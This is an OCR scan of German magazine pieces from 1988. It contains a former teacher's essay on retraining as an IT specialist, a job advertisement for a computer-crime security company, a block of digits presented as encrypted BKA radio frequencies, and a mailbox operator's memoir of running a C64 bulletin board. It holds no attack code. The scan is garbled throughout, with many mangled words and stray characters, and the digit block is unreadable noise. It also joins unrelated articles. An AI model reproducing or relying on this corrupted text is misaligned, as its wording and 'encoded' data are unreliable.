seiner .Fachsprache“ will er Euch ja 
auch nur verdeutlichen, daß er be¬ 
geistert ist und seine Freude mit 
jemandem teilen möchte. Und wer 
weiß, vielleicht entdeckt Ihr dadurch 
noch ganz neue Seiten an Eurem 
Bruder. 



aus: “Go Stop Go", einem Buch aus dem Orlando Verlag 
von Deborah Brecher - ein Frauen-Computer Buch. 

Empfehlenswert! \ ^ 



Quelle: päd. extra & demokratische erxiehung 
Mit freundlicher Erlaubnis der Autorin 


Eva Blumenteld 

Ich habe auf 

EDV-Fachftau 

umgeschult 

Eine ehemalige Lehrerin resümiert 

Frauen und Technik - zwei Welten prallen 
aufeinander oder; Anpassungsfähigkeit - 
Die Stärke der weiblichen Sozialisation? 


S agen Sie mal, Sie als Lehrerin, noch, dazu mit den 
Fächern Sport und Kunst, wie kamen Sie eigentlich aus¬ 
gerechnet auf die EDV?" - So und ähnlich lauten stets 
die Eingangsfragen bei Bewerbungsgesprächen, auf die ich 
schon vorbereitet bin, da schon ein Jahr zuvor sämtliche 
Freundinnen und Bekannte meinen Entschluß zur EDV- 
Umschulung ähnlich erstaunt kommentiert hatten. 

Tja, wie kam ich, die - lang, lang ist's her - 
in allen Schulfächern außer Mathematik glänzte und mit EDV 
nie etwas am Hut hatte, ausgerechnet jetzt dazu, mich als 
EDV-Fachfrau ausbilden zu lassen? Um es vorweg zu ne - 
men: Frust oder der Gedanke, diese Chance als letzten Stroh- 
halm ergreifen zu müssen, waren es nicht. 

Nachdem die Nichleinstellung m den 

Schuldienst das einzige Sichere war, das mir die Zukunft zu 
bieten hatte, war mir klar, daß ich nicht, wie so viele meiner 
Kolleginnen an einer - inzwischen so fragwürdig geworde¬ 
nen -Idealvorstellung von ausgefulltem Lehrerinnendasein 
festhalten wollte, Mit einem Jazz-Tanz- und Gymnastikstudio 
machte ich mich in Wiesbaden selbständig. Die Arbeit mi 
motivierten Erwachsenen (meist Frauen) ^ 

Spaß, aber nach fünf Jahren versetzte mich der Gedanke, mit 
40 oder gar 50 Jahren immer noch graziös vor meiner Spmgei- 
wand herumzuturnen, keineswegs in Entzücken. mzu 
kamen die mit zunehmendem Alter wachsenden Verlockun¬ 
gen materiellen Wohlstands. Ich fühlte, daß die Ara des Exi¬ 
stenzminimums und der abgewetzten Jeans Jetzt langsam 
aber sicher dem Ende zugehen mußte. 

Den entscheidenden Kkk zur EDV gab mir 
eine Freundin, die - ursprünglich Französisch- und Deutsch¬ 
lehrerin - nach erfolgreicher EDV-Ausbildung noch erfolgrei¬ 
cher in der EDV-Branche als Dozentin unterrichtet. Femini- 
stin - wie ich - überzeugte sie mich, daß wir Frauen uns viel 
stärker der, bisher durch und durch männlich dominierten 
Technologie bemächtigen müssen, um sie menschlicher zu 
gestalten. Das wirkte! 

Mit dieser Erkenntnis und mit meinem 




Dickkopf, das zu erreichen, was ich mir vorgenommen habe, 
fing ich meine Unschulung an. Meine Befürchtungen, von 
engstirnigen Computerfreaks umgeben zu sein, deren Kopf 
em einziger virtueller Speicher ist, bewahrheitete sich - Göt¬ 
tin sei Dank - nicht. Ich war erstaunt, in meiner Klasse völlig 
„normale" Leute vorzufinden: Lehrer, Pädagogen, Soziolo¬ 
gen und Psychologen - die Frauen allerdings in absoluter 
Minderheit. 

Die spannendste Entdeckung für mich war, 
zu beobachten, wie mit wachsender Kompetenz und Sicher¬ 
heit der Frauen das Rollenverständnis und die Sicherheit der 
Männer ins Wanken geriet. Und energisch mußten wir Frauen 
manches Mal sein, sei es um ungebetene „gut gemeinte" 
Ratschläge männlicher Kollegen abzuwehren oder um uns 
gegen die männlich-gedankenlose Titulierung als EDV-Fach- 
mann zu wehren. Überhaupt ist die ganze Fachterminologie 
durch und durch männlich. Bei der Berechnung in „Mannjah- 
ren", „Mannmonaten" und „Mannlagen" fragte ich mich 
ernsthaft, was denn die Frauen in der EDV eigentlich machen. 

Auch im Umgang mit dem Unlerrichtsstoff 
und der Technik waren die Frauen unbefangener, ja respekt¬ 
loser als die meisten Männer, die in der Regel ungern Zuga¬ 
ben, wenn sie etwas nicht verstanden. - Oder liegt das daran 
daß wir Frauen zu ignorant sind, einzusehen, daß die Technik 
eine heilige Kuh ist? Für mich ist und bleibt ein Computer 
eine zwar hochkomplizierte, aber dumme Maschine, die nur 
so intelligent ist, wie das vom Menschenhirn erdachte Pro¬ 
gramm, mit dem sie arbeitet. Selbst als EDV-Fachfrau (so darf 
ich mich jetzt nennen!) vermag ich in dem Mythos Computer 
nichts hintergründig Geheimnisvolles zu sehen - wie so viele 
meiner Kollegen. Wir Frauen sind deshalb für manche Män¬ 
ner eine Bedrohung, weil wir in der Lage sind, die Technik zu 
entmystifizieren, weil wir, respektlos wie wir sind, in der 
Technik nichts anderes sehen als ein arbeitserleichterndes 
Hilfsmittel, das uns in die Lage versetzt, uns wesentlicheren 
Dingen zuzuwenden. Das Wesentliche ist nicht - wie einige 
Männer meinen - die Technik selbst, sondern wie wir tnit 
unseren mit Hilfe der Technik ermöglichten Kapazitäten und 
Freiräumen umgehen. Doch zurück zur Pädagogik. 

A propos Pädagogik, ich fühlte mich wäh¬ 
rend meiner EDV-Ausbildung sehr oft an Untersuchungen 
über geschlechlsspezifische SoziaUsation in der Grundschule 
erinnert. Während sich jedoch, wie bereits beschrieben, die 




Rolle der „Mädels" inzwischen grundlegend geändert hat 
(zumindest der EDV-Mädels, wobei diese nicht repräsentativ 
sind), vermochte ich in den Männern oft nur große (wenn 
auch inzwischen etwas sensiblere) Buben zu sehen, was 
sicherlich mit der häufig etwas unreflektierten männlichen 
Technikbegeisterung zu tun hat. 

So fand ich eines Tages, als ich meine alle¬ 
samt männlichen Projekt-Kollegen suchte, diese im Hofe 
unseres EDV-Instituts vor, wo sie kopfüber in einem riesigen 
Müllcontainer steckten, aus dem sie, ganz glücklich, einen 
Haufen kaputter, ausrangierter Tastaturen und Terminals 
zerrten, die sie sofort als ihre Beute in Sicherheit brachten, um 
sie später zu Hause zu zerlegen. Das nennt man{n) Recycling, 
frau kann darauf nur mit einem nachsichtigen Lächeln rea¬ 
gieren - ebenso wie auf den Dozenten, der in mühevoller 
Heimarbeit ein Modell einer Datenfernübertragungseinrich¬ 
tung gebastelt hatte und uns im Unterricht mit leuchtenden 
Augen ans Herz legte, diese einmalige Gelegenheit zu nutzen 
und damit zu spielen. Der Fairneß halber muß gesagt werden, 
daß es wirklich sehr beeindruckend war, wenn durch Zusam¬ 
menbringen von Steckverbindungen diverse Glühbirnchen 
aufleuchteten. 

Was die Lehrkräfte betrifft, so kann man 
schon sagen, daß die Frauen mächtig auf dem Vormarsch 
sind: Immerhin gibt es inzwischen eine (!) weibliche Lehrkraft 
von ca. 20 am Institut, in dem ich die Ausbildung absolvierte. 

Auch hier ein gravierender Unterschied: 
Während viele männliche Dozenten, die mal eine Frage nicht 


beantworten konnten (was immer mal vorkommt), nie Zuga¬ 
ben, daß sie die Antwort nicht wußten, sondern in abenteuer¬ 
lichen „intellektuellen" Klimmzügen drumrumhangelten, 
gab die Frau unumwunden zu, daß sie es nicht wisse, sie 
wolle sich informieren bzw. es im Praktikum mit uns zusam¬ 
men ausprobieren. Dies brachte ihr von vielen - immerhin 
erwachsenen - Schülern prompt den Vorwurf mangelnder 
Kompetenz ein. Daß die aus der Erwachsenenbildung kom¬ 
mende Diplom-Pädagogin didaktisch-methodisch hervorra¬ 
genden Unterricht hielt, schien den meisten Schülern (die 
immerhin zum größten Teil selbst Lehrer sind, aber das sind ja 
bekanntlich die schlimmsten) weniger zu bedeuten als nach¬ 
lesbares Fachwissen. 

Nach ISmonatiger EDV-Ausbildung habe 
ich, die früher Überlegungen anstellte, ob ein Byte etwas 
Eßbares sei, genausoviel begriffen und gelernt wie die mei¬ 
sten anderen auch; und ich habe die für mich wichtige Erfah¬ 
rung gemacht: Es gibt kaum etwas, das so schwierig und 
kompliziert ist, wie es uns Frauen gerne weisgemacht wird. 

Inzwischen habe-ich eine gut bezahlte Stel¬ 
le in der EDV-Abteilung einer genossenschaftlichen Versi¬ 
cherung gefunden und freue mich auf alles Neue, das mich 
dort erwartet, denn: Wir Frauen sind ja bekanntlich furchtbar 
neugierig. 


Unsere Autorin: 


prfj. extra &. dentokratiiche erziehang April 19C8 


Eva Blumenfeld, Jahrgang 1956, Haupt* und Realschullehrerin, selbständige 
Jazztanz* und Gymnastiklehrerin, Bildhauerin, EDV-Fachfrau, Wiesbaden 


Wir sind ein junges Unterrfehmen mit,Sitz bei und 

beschäftigen uns mit Slcherneitssystemen, die insbesondere in der 
Datenverarbeitung, aber auch beim Objektschutz Verwendung 
finden. Aktueller Schwerpunkt ist die 

Computer-Kriminalität 

Wir bieten nicht nur unsere Beratung, sondern auch Technologien an. 
die zum Beispiel ursprünglich'für den amerikanischen CIA entwickelt 
und jetzt freigegeben wurderi. Wir haben das Alleinvertretungsrecht 
für den deutschen Sprachraum. Die weltweite Auswertung weiterer 
Erfindungen ist uns angeboten. 

Die Computer-Kriminalität, das- heißt unberechtigtes Entwenden 
gespeicherter Daten, Fahren von Lauschangriffen zur Industriespio¬ 
nage, Setzen von Viren in fremde EDV-Ar]lägen zur Manipulation oder 
Zerstörung von Programmen und Daten, steckt weltweit erst in den 
Anfängen. Was 13jährigen .Hackern' gelingt, können Profis mit 
entsprechender technischer Ausrüstung noch besser. Dem wirksa¬ 
men Schutz dagegen gehört der Markt der . Zukunft.. Zu unseren 
Kunden werden alle Unternehmen und Institutionen gehören, die mit 
der Vertraulichkeit und Geheimhaltung unterliegenden Daten arbeiten 
und solche auch speichern, vor allem die Großbetriebe, Banken, 
Versicherungen und Behörden. 

Unserer Gesellschaft stehen Fachleute und Experten mit vieljähriger 
Erfahrung im Bereich der Computer-Kriminalität und eine Verfriebsor- 
ganisation zur Verfügung. Die Verstärkung unserer Aktivitäten macht 
die Einstellung eines sehr kreativen und dynamischen 

Geschäftsführers 

notwendig, der in der Lage ist, das Unternehmen weiter aufzubauen. 
Erforderlich sind Verständnis für High-Tech-Produkte, die Fähigkeit 
zur Entwicklung neuer Marktkonzeptionen, Kenntnisse in Hardware 
und Software, absolut seriöses und überzeugendes Auftreten, 
sichere Verhandlungsführung sowie die Befähigung zur Motivation 
und Führung von Mitarbeitern. Die Dotierung sieht eine Gewinnbeteili¬ 
gung vor. Eine später gewünschte Kapitalbeteiligung soll nicht 
ausgeschlossen sein. 

Ausführliche Bewerbungen in üblicher Form mit Lichtbild und 
Einkommensvorstellungen erbitten wir — Diskretion ist selbstver¬ 
ständlich — an die von uns betraute 

Zimmerma nn Wirt schaftsberatung GmbH 

Schöne Aussicht ■■■■ Samsjag/Sonntag, 23./24. April 1988 


HcUij.L f.'il 

trG 

M'd TI n< ? i- < 

I)<..3w-ri Jre-f-rM •’r V-notl; - 1 . 1 'f'te.ÖU 

(Jofoofoooo-f-foo-t /o VO^ 04 000 4 odd OÖO/oo«>t O4<'0't9‘f'tio<l1^ 
oooHdoYooo'looo /oi>o1-I(J401144'10o4/Qoo4446o444o1tKr1' 
00 0 111 «10 Holl.»/ODoi-fn-t OII00II O/oelolnoooofloOf/ 
OOlol oee-ioo lono/00 lo/fio/t d co4 / 

1010 « oo/ooHo1oo11'i1i1ol/oo11/1oo4oo6o-1i4l/ 
O0III00I00 0-14111 /^oo 111 0 0IIIIo*c 4 o/öo 44 Mo-( 6 'IiMi!- 
OlOoo-ll'Jöoool'l.j 0/0I0IIII 000 I0III' /o«ooo11‘>‘)oo«o/ 

Col 0 »00111111 oe/b olPOlo»o»14o o^/ooo'^c^ooo'toiiooo/ 

Oo, 0'f 00 ^ oo4 /00o-44orf 01006 oo'\ J 

«»o-m ool-^l 01 ool /ÖO Olli OA caA oll ö o/ooolll-Jl 011 cj 
voocöOOo ^00 00000 00 (^c oooeoceotfoe>c>c>o/ ' 


QOOÖOOo ^ ^0 00000 OOOo oooooüeo^oocoo/ ' 

, , 1 . \ if II 




ts nandelt sich bei den Nullen um Einsen um die verschlüsselten Fre- 
quenzangaben des BKA-Datenfunkes, die im Manuskript zur Hackerbibel 
il'. öfsten Zeile des zweiten Absatzes standen. Leider 

ist der Schlüssel verlorengeqangen (ab in die Elbe damit; d. Sä.), aber die 
Äff durch einfache journalislische Recherche z.B. In einer 

oiientlichen Bücherei zu erfahren. 


Ein Mailboxbetreiber erzählt 


von Reinhard Schrutzki 


Ein zarter Lichtstrahl fällt durch das halbblinde 
Fenster auf meinen Monitor und versperrt den 
Ausblick auf wichtige Daten. “^Aha, es ist wieder 
Frühling“, schießt es durchs Hirn. Mühsam re^- 
se ich den Blick los von der zweidimensionalen 
Schlichtheit und wende ihn QS^enwarts^ Lang 
drinot Frühlingswirklichkeit in mein Be 
wu ßtsein. Ein letztes Mal gleit J das Au^ber 
die Reihe der Bildschirme, die 
iunaen Sonne zu verblassen drohen. Schon 
halb auf der Treppe und dem 
nahen Park durchzuckt mich die Frage. Wie 
konnte das alles passieren?“ 

Meine erste Begegnung mit dem D^puter 
hatte ich während der Ausbildung zum Elek 
tromeSraniker. Der Personalcomputer war 
knapp zwei Jahre alt und hatte seinen Sie- 
aeszug gerade erst begonnen, aber schon wa¬ 
ren zumindest für angehende Techniker, die 
Springfluten erkennbar, die er mit sich bnng®n 
würde. Da die Ausbildungsvergutung, die ich 
damals erhielt, bei weitem nicht ausr^chte.urn 
mich in den Besitz der begehrten Gerate zu 
setzen, blieb es zunächst bei emer platoni¬ 
schen Beziehung. Die sah so aus daß ich 
ständig zum Zeitschriftenhandler lief, um die 
neuesten Fachzeitschriften zu erstehen und 
selbige in der Abgeschiedenheit meiner Woh¬ 
nung zu verschlingen. 

Rund ein Jahr später erfolgte dann der erste 
große Einbruch auf dem Computermarkt, b r 
Clive Sinclair brachte mit dem ZX 80 erstmals 
einen Homecomputer auf den Markt, der Tur 
kleine Geldbeutel erschwinglich war. Für we¬ 
niger als tausend Mark konnte man nun ein 
zigarrenschachtelgroßes Etwas erstehen das 
bei der kleinsten Berührung die Arbeit ^eri ^jy 
den vergaß und etwa soviel Speicheipiatz hat¬ 
te, wie heute benötigt werden um die ersten 
zwei Zeilen einer Grafik darzustellen, ln der Tat 
war die Leistungsfähigkeit dieser Maschine so 
begrenzt daß einem gar nichts anderes übrig 
b^eb als sich mit der Alchimistenkuche der 
maschinennahen Programmierung S'.cfür 
schäftigen, alles andere hatte m der Ausfüh¬ 
rung viel zu lange gedauert. 


Die Werkzeuge, die dem ZX80/81-Program¬ 
mierer zur Verfügung standen, waren der Rech¬ 
ner selbst, das bis heute unerreicht gute Hand¬ 
buch, sowie Rod Zak’s “Programming the Z80“, 
alle Lektüre selbstverständlich in englischer 
Sprache, denn der deutsche Markt existierte 
noch nicht. Die Umsetzung in eine maschi¬ 
nenlesbare Form geschah im Kopf und auf 
Bergen von Papier, denn es gab keine Pro¬ 
gramme, die diese Arbeit übernehmen konn¬ 
ten. Der Prozessorbefehl wurde anhand der 
Zeichentabelle im Handbuch verschlüsselt und 
das zugehörige Zeichen virtuos auf der fünffach 
belegten Tastatur in den Rechner gehackt. Es 
hat eigentlich nie wieder so unmittelbare Er¬ 
folgserlebnisse für mich gegeben, wie damals, 
wenn sich nach fünf Stunden intensivster Arbeit 
herausstellte, daß man tasächlich schnell be¬ 
wegte Bilder mit dieser oft als Digital-Tür- 
stopper verrissenen Maschine erzeugen konn¬ 
te. Gewiß, die grafische Darstellung war nicht 
besser als das legendäre TV-Tennis, das den 
Ruhm der Videogames begründete, aber er¬ 
schwingliche Alternativen gab es halt nicht. 

Der nächste Meilenstein für mich war der Com- 
modore VC20. Diesen Rechner würdigte ich 
dadurch, daß ich ihn nicht kaufte, denn es war 
klar, daß da mehr sein mußte als ein farbiger 
ZX81, bei dem jede Erweiterung einen Mo¬ 
natslohn kostete. Und richtig, wenig später er¬ 
schien der Commodore 64 auf der Bildfläche 
ein vielfarbiger Speicherriese mit vollen 64 kB 
Speicher, der Möglichkeit, einfach Zusatzge¬ 
räte wie Floppy-Laufwerke und Drucker an¬ 
zuschließen und mit damals 1400 DM uner¬ 
reicht preiswert, wenn man die neuen Mög¬ 
lichkeiten mit dem Marktstandard verglich. lm 
Gegensatz zu anderen Maschinen, die viel¬ 
leicht mehrfreien Speicher hatten, oder schnel¬ 
ler waren, hatte der C64 den Vorteil, eine wirk¬ 
lich offene Maschine zu sein, die sich mit ver¬ 
gleichsweise geringem Aufwand auch für Dinge 
nutzen ließ, an die wohl nicht einmal der 
Steller gedacht hat. Dies zeigt sich auch daran 
daß dieser Rechner nunmehr im sechsten Jahr 
steht und sich millionenfach verbreitet hat. Das 
Angebot an Programmen ist schier unüber 
sehbar geworden, wenngleich auch der 
Schwerpunkt bei den Computerspielen anzn 
siedeln ist, weniger bei Gebrauchssoftware 



Das Interesse am C64 hielt zwei Jahre und 
flachte dann ab. Irgendwie wurde es unbefrie¬ 
digend, immer wieder irgendwelche Spiele zu 
spielen, oder sich mit einem unzulänglichen 
Textprogramm herumzuärgern. Die unver¬ 
meidliche Erkenntnis, daß man seine private 
Adressenliste doch besser mittels eines No¬ 
tizbuches führte, statt mit dem Computer, der 
erschreckend unrationell war, wenn man drei 
Minuten auf eine Ausgabe warten mußte, die 
man auch binnen Sekunden hätte nachschla¬ 
gen können, tötet jede Euphorie. Die Tage, an 
denen die Kiste ausgeschaltet blieb, mehrten 
sich und im Frühjahr 1984 war alles zum Still¬ 
stand gekommen. Die Situation warähnlich wie 
bei einer vom Bankrott bedrohten Firma, mit 
dem vorhandenen Material war nichts mehr 
anzufangen, trotzdem stellte es einen Wert dar, 
der zu nutzen war. Logische Konsequenz; ent¬ 
weder weiter investieren oder alles als Verlust 
abschreiben. Da traf es sich gut, daß die Post 
nach langem Hin und Her endlich die Erlaubnis 
erteilt hatte, Geräte zur nichtöffentlichen be¬ 
wegten Datenübertragung zu benutzen, die so¬ 
genannten Akustikkoppler, die zu Preisen um 
1000 DM den Einstieg ins Weltdatennetz an- 
boten. 

Epson CX21 hieß der Schlüssel zum globalen 
Dorf, und war ein unscheinbares, kantiges Et¬ 
was, das sich standhaft weigerte, etwas an¬ 
deres als den Hörer einergrauen Maus, wie der 
Fernsprechtischapparat 612 gerne genannt 
wird, zu akzeptieren. Dieses Gerät setzte die 
Zeichen, die der Computer von sich gab, in 
hörbare Töne um und konnte entsprechende 
Töne eines anderen Computers wieder in ein 
maschinenkonformes Format umsetzen. Die 
Faszination dieser eher profanen Maschine lag 
darin, daß es plötzlich egal war, welchen Com¬ 
puter man benutzte, ob am anderen Ende des 
Drahtes ein Homecomputer oder ein Gro߬ 
rechner war, und wo dieser fremde Rechner 
stand. Japan, Amerika, Afrika - das alles 
schrumpfte zu mehr oder weniger langen Vor¬ 
wahlen und im heimischen Wohnzimmer gaben 
sich Leute ein Stelldichein im grünen Schimmer 
ihrer Monitors, ohne sich jemals von Angesicht 
zu Angesicht gesehen zu haben. 

Selbst bei der besten interkontinalen Sprech¬ 
verbindung ist man sich immer der Entfernung 
zum Gesprächspartner bewu ßt, so typisch sind 
die Laufzeiten der Signale, das Rauschen 
transatlantischer Tiefseekabel und das Echo 
ferner Satelliten. Beim Gespräch von Tastatur 
zu Tastatur entfallen diese Merkmale, es gibt 
keine Hinweise mehr auf die Entfernung zwi¬ 
schen den Stationen und Meldungen wie “Con¬ 
nection 80, Capetown“ sind bloße Zeichen auf 


dem Schirm ohne weitere Bedeutung. Die 
Sprache der Computer ist Englisch, und das ist 
auch die Sprache, die man überall im globalen 
Dorf versteht. Umsogrößer ist dann die Über¬ 
raschung, wenn man feststellt, daß der Ge¬ 
sprächspartner, den man im fernen Japan 
wähnt, nur ein paar Straßen weiter in Hamburg 
wohnt und sich nur zufällig auf den gleichen 
Rechner in Ubersee eingewählt hat. 

Meist ist es die Post, die vermittels Ihrer Fern¬ 
melderechnungen den Sinn für Realitäten wie¬ 
der geraderückt. Nach etlichen tausend Ge¬ 
sprächseinheiten tritt die Ernüchterung ein und 
man beginnt damit, sich Gedanken über andere 
Nutzungsmöglichkeiten zu machen. Bleibe im 
Lande und nähre dich redlich, so lautet die 
Devise und internationale Kontakte schrump¬ 
fen auf das unvermeidliche Mindestmaß. Nur 
gab es damals in Deutschland bloß eine Hand¬ 
voll von Systemen, die man per Telefon errei¬ 
chen konnte, und in Hamburg gar nur zwei, 
nämlich den Rechner der Universität, der hoff¬ 
nungslos überlastet war und mehr als subver¬ 
sive Müllhalde diente, denn als Kommunika¬ 
tionssystem, sowie MCS. 

MCS heißt Master Control System, und das ist 
eine schlichte Übertreibung, denn hinter dem 
klangvollen Kürzel verbarg sich ebenfalls ein 
C64 und ein einigermaßen chaotisches Ba- 
sicprogramm sorgte dafür, daß alles mögliohst 
absturzfrei funktionierte. Zu einer Zeit, als Da¬ 
tenfernübertragung für die meisten Benutzer 
noch reiner Selbstzweck war, bot MCS die 
Möglichkeit, einem der anderen hundert oder 
zweihundert Benutzer eine Nachricht zukom¬ 
men zu lassen, oder aber seine Ergüße in 
einem öffentlichen Brett auf die Allgemeinheit 
loszulassen. “Warum schreibt mirden keiner ne 
PME?“ und “Kilroy was here“ waren typische 
Nachrichten in diesen Tagen, nur hin und wie¬ 
der von einigermaßen inhaltlichen Beiträgen 
unterbrochen. Aber, und nur das ist letztlich 
wichtig, MCS war eine der ersten Mailboxen, 
die es ermöglichten, sich unabhängig von den 
bestehenden Netzen zu machen, eine eigene 
DFÜ-(Sub)Kultur zu entwickeln und ich nutzte 
diese Möglichkeit zweimal täglich, wann immer 
es ging. 

Irgendwie kam ich im Herbst 1984 zu einem 
zweiten Rechner, ebenfalls einem C64. Dieser 
stand zunächst nutzlos herum und hüllte sich in 
Staub und Nutzlosigkeit. Das Schicksal wollte 
es, daß mein Interesse an MCS auch wieder im 
Erlahmen begriffen war, einfach weil es zu¬ 
wenig Inhaltliches gab, das meine Neugier 
weckte oder meine Phantasie anregte, und weil 
beinahe täglich neue Dinge ins Programm ka- 




men die man sich merken mußte, wollte man 
dabeibleiben. Hinzu kam die ständig wach¬ 
sende Zahl der Benutzer, die es sehr oft un¬ 
möglich machten, zu vernünftigen Zeiten in die 
Mailbox zu kommen, was einem gestandenen 
Hacker zwar nichts ausmacht, aber doch lästig 
ist wenn man Morgens um Sechs aufstehen 
und arbeiten muß. Andere Benutzer hatten das 
auch erkannt und der große Mailboxboorn in 
Hamburg begann, denn die logische Folge¬ 
rung wenn man mit etwas unzufrieden ist, ist, 
es besser zu machen. Ich besorgte mir also das 
Programm der MCS-Mailbox, bastelte eine Ap¬ 
paratur, die den Telefonapparat bediente und 
machte meine eigene Mailbox auf. 








l' ÖS' '' 




1 i 1 v. 


1 

1 










Early compulcr in Lol Alamol. probably MANIAC or MADCAF by K E. Will« 

Die Tatsache, daß ich auf zwei Computer zu¬ 
greifen konnte, war eine pn. 

dingungen für die eigene Mailbox^ 
satz zu den meisten anderen Betreibern, die 
ihren einzigen Computer zweckentfremdeten, 
war ich in der Lage, die Dienste Mailbox von 
Anfang an rund um die Uhr anzubieten, wenn 
man von kleinen Pausen zwecks Eigennutzung 
des einzigen Telefonanschlusses mal absiem. 
Die ersten drei Monate gab es nur einen inof¬ 
fiziellen Probebetrieb, die Rufnummer war nur 
guten Freunden bekannt, die das Programm 
auf Herz und Nieren testen sollten. Große Feh¬ 
ler waren nicht zu erwarten, so dachte icm, da 
das Programm ja schon mehrfach von anderen 
Betreibern eingesetzt wurde. 


Erkenntnis in mein Hirn ein, daß kein Programm 
fehlerfrei sein kann, und die Wahrscheinlich¬ 
keit, schwerwiegende Fehler vor ihrem Auf¬ 
treten zu entdecken, umgekehrt proportional zu 
dem Schaden ist, den sie anrichten. Wohl in 
keinem anderen Bereich werden einem Mur- 
phy’s Gesetze so deutlich bewußt, wie beim 
Umgang mit dem Computer. 

Eine Hürde gab es noch zu überwinden, näm¬ 
lich einen sinnreichen Namen zu finden, der 
sich einprägsam abkürzen iieß, genau wie 
MCS, RAM und wie sie alle hei ßen. Da für mich 
feststand, daß mein System sich deutlich von 
den anderen abgrenzen sollte, war es nur kon¬ 
sequent, zuerst die Abkürzung 
zu ersinnen, und dann einen 
Begriff zu schaffen, der sich 
passend abkürzen ließ. Da ich 
wenige Jahre zuvor bei einer 
Rockgruppe namens Goblin 
mitgemischt hatte, und diesen 
Namen dann als Pseudonym 
für meine Datenreisen benutzt 
hatte (und das auch heute noch 
tue), lag es nahe, auch für die 
Mailbox einen Namen aus die¬ 
sem Bereich zu wählen. Nach 
drei Flaschen Bier und weh¬ 
mütigem Hineinhorchen in alte 
Aufnahmen der Band war es 
dann sonnenklar: CLINCH soll¬ 
te das Projekt heißen, ein Kür¬ 
zel, das eine gewisse Eigen¬ 
dynamik mit sich bringt und 
beim Leser Assoziationen 
weckt. Nur - für was um Alles 
in der Welt ist das eine Abkür¬ 
zung ? Etliche Biere später 
dem Vollrausch und derri 
Wahnsinn gleich nahe, hatte ich dann endlich 
einen Anglizismus ausgebrütet, der sich pas¬ 
send abkürzen ließ: Communication Link - In¬ 
formation Network Computer Hamburg, auf 
schlecht Deutsch: Verständigungsglied - in- 
formationsnetzwerkcomputer Hamburg, ein 
absolut hochtrabender Name, der keinsfalls mit 
der Realität übereinstimmte, die in Gestalt 


IT - 


eines C 64 vor sich hindümpelte. 


Daß dies ein Denkfehler war, stellte sich 6>'st im 
Laufe der Zeit heraus, als ein versteckter Fehler 
nach dem anderen zutagetrat. Das brannte die 


Nun, die Netze entstehen in den Köpfen. Und 
eines Tages war der Tag da, an dem ich den 
großen Schritt wagte: Die Rufnummer der Box 
wurde auffällig unauffällig in einer anderen 
Hamburger Mailbox plaziert und ich wartete 
gespannt auf das, was kommen sollte. Die 
Stunden verrannen und nichts geschah. Nicht 
ein Anrufer verirrte sich in meinen Computer 
und Verzweiflung machte sich breit. Später 
begann es zu dämmern, und zwar sowohl dern 


I 





dahingehenden Abend, als auch mir. Ich warf 
die Lacklederkutte über und begab mich trep¬ 
pab zur nahen Telefonzelle. Der Kontrollanruf 
bei mir selbst ergab, daß offenkundig doch 
jemand angerufen hatte, natürlich just in dem 
Moment, als ich auf dem Weg zur Zelle war. 
Also flugs zurück in die heimische Wohnung, 
drei Stufen auf einmal nehmend, die Türe auf¬ 
geschlossen, ein Blick auf den Monitor und - 
Ratlosigkeit. Der Rechner wartete nach wie vor 
stoisch auf den ersten Anrufer. 

Eine genaue Analyse der Ereignisse und Nich¬ 
tereignisse legte den Schluß nahe, daß wohl ein 
Fehler in der ausgefeilten Abhebemechanik 
vorlag, die ich ersonnen hatte, um mich nicht 
völlig ins Gesetzesabseits des illegalen Mo¬ 
demeinsatzes zu begeben. Mein kleiner Ro¬ 
boterarm, dessen Aufgabe es war, die Tele¬ 
fongabel niederzudrücken, wenn der Rechner 
es ihm befahl, hatte offenbar nicht genügend 
Kraft, um das Telefon sicher aufzulegen. Eine 
kleine technische Änderung wurde vorgenom¬ 
men, und es funktionierte wieder zufrieden¬ 
stellend. Programmgemäß kam der erste Anruf 
dann auch fast unmittelbar nach Beseitigung 
der Störung. Gespannt verfolgte ich die Schrit¬ 
te, die der Anrufer in der Box unternahm. Of¬ 
fensichtlich war er schon an Mailboxen ge¬ 
wöhnt, die nach dem MCS-System arbeiteten, 
denn er hatte kaum Probleme, sich zurecht¬ 
zufinden. Selbst die Abweichungen, die ich mir 
erlaubt hatte, um die schwindende Befehlslogik 
des Programms aufrechtzuerhalten, machten 
ihm nichts aus und er entschwand nach etlichen 
Minuten mit dem Kommentar“Hiersteht ja noch 
gar nichts drin.. Das war der Zeitpunkt, an 
dem mir klar wurde, daß es nicht ausreicht, 
einen Rechner übrig zu haben und darauf ein 
halbwegs funktionierendes Mailboxprogramm 
laufen zu lassen, sondern daß man sich auch 
darum kümmern mußte, was in der Mailbox 
passierte. Diese Erkenntnis kommt bei man¬ 
chen Betreibern leider nie, und ich bin diesem 
ersten Anrufer heute noch dankbar für dieses 
erste, vernichtende Urteil. 

Ich begann also, mir Gedanken zu machen, 
was ich denn in meiner Box anders machen 
wollte, als die anderen Betreiber. Leider war 
das Grundkonzept des von mir verwendeten 
Programms nicht gerade dazu angetan, die mir 
vorschwebenden Änderungen durchzuführen. 
Hinzu kam, daß die Art, wie das Programm 
erstellt worden.war, nicht gerade dazu ani¬ 
mierte, eigene Änderungen und Verbesserun¬ 
gen durchzuführen. Noch heute sträuben sich 
mir die wenigen verbliebenen Haare, wenn ich 
auf ein Programm stoße, das mit dem Aufruf 
eines Unterprogramms beginnt, ohne daß die 


Notwendigkeit dieses Tuns ersichtlich wäre. 

Wie dem auch sei, der Not gehorchend machte 
ich aus selbiger eine Tugend und begann recht 
bald damit, mich nach anderen Programmen 
umzusehen. Im Lauf derzeit hatte ich eine recht 
stattliche Anzahl davon zusammen und begann 
damit, mir anzusehen, wo die jeweiligen Vor- 
und Nachteile lagen. Ich habe an andererstelle 
davon gesprochen, daß der C64 ein Spei¬ 
cherriese sei; diese Aussage gilt es nun zu 
relativieren, wenn es um so komplexe Dinge 
wie ein Mailboxprogramm geht. Der verfügbare 
Speicher reicht einfach nicht aus, um all das 
hineinzupacken, was man meint, zu brauchen. 
Das hat sich auch bei den jetzt üblichen Me¬ 
gabyte-Giganten nicht geändert. Es scheint, 
als wäre jeder Computer für den Zweck, zu dem 
man ihn einsetzen will, zu klein. 

Aus dem Sammelsurium der verschiedenen 
Programme entstand schließlich mein erstes 
selbstgeschriebenes Mailboxprogramm, das 
meiner Meinung nach die Vorteile der ver¬ 
schiedensten Mailboxkonzepte vereinigte, oh¬ 
ne ihre Nachteile zu haben. Die Benutzerwaren 
zunächst anderer Meinung, so gravierend wa¬ 
ren die Abweichungen in der Bedienung von 
dem, was in der Mailboxszene als Standard 
galt. Einige dieser Abweichungen waren tech¬ 
